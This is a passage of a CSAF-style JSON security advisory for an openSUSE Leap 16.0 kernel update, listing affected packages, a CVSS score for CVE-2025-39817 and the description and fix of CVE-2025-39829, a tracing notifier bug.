"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39817"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
